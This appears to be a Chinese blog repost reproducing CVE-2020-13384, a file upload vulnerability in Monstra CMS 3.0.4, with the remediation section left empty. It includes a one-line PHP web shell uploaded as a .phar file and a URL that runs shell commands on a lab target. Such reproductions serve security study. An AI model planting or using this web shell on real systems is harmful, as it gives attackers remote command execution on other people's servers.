CVE-2020-13384:monstra 文件上传

news/2024/11/15 13:45:59/

漏洞描述

Monstra CMS 3.0.4版本中存在着一处安全漏洞,该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。
该程序不允许’html’, ‘htm’, ‘js’, ‘jsb’, ‘mhtml’, ‘mht’, ‘php’, ‘phtml’, ‘php3’, ‘php4’, ‘php5’, ‘phps’,‘shtml’, ‘jhtml’, ‘pl’, ‘py’, ‘cgi’, ‘sh’, ‘ksh’, ‘bsh’, ‘c’, ‘htaccess’, ‘htpasswd’,‘exe’, ‘scr’, ‘dll’, ‘msi’, ‘vbs’, ‘bat’, ‘com’, ‘pif’, ‘cmd’, ‘vxd’, ‘cpl’,'empty’后缀的文件上传

影响范围

3.0.4

漏洞复现

访问靶机进行注册,随意填写就好
在这里插入图片描述
在这里插入图片描述

这里也随意注册
在这里插入图片描述

因为配置文件的白名单,我们只能上传指定后缀名的文件
在这里插入图片描述

我们编写phar文件

<?php if(isset($_REQUEST['cmd'])){echo "<pre>";$cmd = ($_REQUEST['cmd']);system($cmd);echo "</pre>";die;}?>

在这里插入图片描述

我们进行文件上传
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

我们访问我们上传木马文件并执行命令

http://123.58.224.8:49663/public/uploads/test.phar?cmd=ls%20/tmp

在这里插入图片描述

漏洞修复

参考

https://www.exploit-db.com/exploits/48479
https://xz.aliyun.com/t/7850

http://www.ppmy.cn/news/114279.html

相关文章

英特尔锐炫 A770、A750 评测

英特尔锐炫 A770、A750 评测

锐炫 A770 限定版采用了 32 个 Xe 核心&#xff0c;标注的 GPU 频率为 2100MHz。其他方面&#xff0c;这款显卡最高搭载 16GB 17.5Gbps 256bit GDDR6 显存&#xff0c;TDP 为 225W&#xff0c;采用 86pin 供电&#xff0c;配备四个 DP 2.0 接口和一个 HDMI 2.1 接口。显卡选 A7…
阅读更多...
a770参数 a770评测 a770显卡相当于n卡

a770参数 a770评测 a770显卡相当于n卡

A770显卡在性能上大约比RTX 3070略强&#xff0c;相当于RTX 3070 Ti&#xff0c;供电则是86Pin辅助供电&#xff0c;最高功率可以到300W&#xff0c;当然这款显卡的满载功耗要比300W低得多。 a770性能怎么样这些点很重要 http://www.adiannao.cn/dq 英特尔Arc A770是英特尔有史…
阅读更多...
amd显卡用黑苹果输出黑屏_黑苹果AMD NVIDIA Intel显卡咋驱动?速戳这里

amd显卡用黑苹果输出黑屏_黑苹果AMD NVIDIA Intel显卡咋驱动?速戳这里

黑苹果安装成功后&#xff0c;驱动显卡非常重要&#xff0c;没显卡驱动的系统是非常卡顿的&#xff0c;所有基本操作都会掉帧&#xff0c;更别说看视频以及玩游戏了。现在黑苹果下显卡无非也就三种&#xff1a;Intel核显 Intel核显 非常容易驱动的一类显卡&#xff0c;笔记本一…
阅读更多...
monstra 文件上传 (CVE-2020-13384)

monstra 文件上传 (CVE-2020-13384)

monstra 文件上传 &#xff08;CVE-2020-13384&#xff09; monstra 文件上传 &#xff08;CVE-2020-13384&#xff09;0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 所有文章&#xff0c;仅供安全研究与学习之用&#xff0c;后果自负! monstra 文件上传 &#xff0…
阅读更多...
IPv6环境下的网络安全观察报告总结

IPv6环境下的网络安全观察报告总结

惯犯跟踪 “惯犯”意为我们监控到多次进行攻击的攻击源&#xff0c;持续时间较长&#xff0c;波及面较广或者危害程度较深。针对网络中的惯犯进行针对性的分析&#xff0c;能够帮助感知网络态势&#xff0c;提升威胁情报的数据深度。我们从源 IPv6 中整理出一些国外的惯犯地址…
阅读更多...
安卓导航选购指南

安卓导航选购指南

转摘自&#xff1a;https://post.smzdm.com/ju/ad4xry9/ 这篇文章让我们大概知道当前市面上车载导航普遍使用的硬件方案。 第一部分 新导航的选购 目前 车载导航市场有 鼎微 、 掌讯 、方易通、 诺威达 、迪恩杰这5家的方案&#xff0c;鼎微、掌讯方案的市场份额较高。国内所有…
阅读更多...
无线蓝牙模块在汽车DSP的应用

无线蓝牙模块在汽车DSP的应用

无线蓝牙模块在汽车DSP的应用 DSP为数字信号处理器&#xff0c;广义是指数字信号处理运算的微处理器&#xff0c;汽车DSP在此基础上增加了电子分频功能实现主动分频&#xff0c;并增加了7850的功放&#xff0c;变成了一台带数字信号处理电子分频的信号。狭义上DSP更多运用在原…
阅读更多...
750ti显卡能支持服务器吗,NVIDIA Geforce GTX 750 Ti能玩吃鸡吗

750ti显卡能支持服务器吗,NVIDIA Geforce GTX 750 Ti能玩吃鸡吗

好多朋友们的电脑配置较低&#xff0c;显卡也是当年主流级GTX 750Ti&#xff0c;如今已经是GT10系列争霸时代&#xff0c;所以很多游戏逐渐抛弃了老显卡&#xff0c;性能不达到要求是不能流畅运行的。NVIDIA Geforce GTX 750 Ti能玩吃鸡吗&#xff0c;下面引用吧友们的分享&…
阅读更多...
最新文章

Copyright @ 2022~2023